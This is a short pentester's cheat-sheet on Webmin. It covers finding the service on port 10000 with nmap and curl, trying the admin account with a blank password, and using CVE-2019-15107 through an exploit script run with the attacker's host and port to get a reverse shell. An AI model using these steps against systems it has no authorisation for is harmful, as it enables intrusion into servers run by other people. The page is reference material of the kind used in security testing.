webmin
Webmin (3.3k β) is an open-source web-based interface for system administration for Linux systems. From the interface, we can:
- Manage packages
- Manage users
- Manage system configurations
- Manage network configurations
- ...
Port π: 10000 (TCP)
To edit the DNS configuration, navigate to Networking > Network Configuration > Hostname and DNS Client.
Pentester Notes β οΈ
Enumeration
- You can use nmap
$ nmap -p 10000 IP
10000/tcp open snet-sensor-mgmt
$ nmap -p 10000 -sV IP
10000/tcp open http syn-ack MiniServ 1.890 (Webmin httpd)
- You can use cURL too if you want to find the version
$ curl -s -I -k https://IP:10000 | grep Server
Server: MiniServ/1.890
FootHold
It might be worth testing admin:<blank> credentials.
Well-Known CVEs
- You may be able to exploit CVE-2019-15107
$ [...] # start a reverse shell listener
$ python3 webmin_exploit.py target_ip target_port host_ip host_port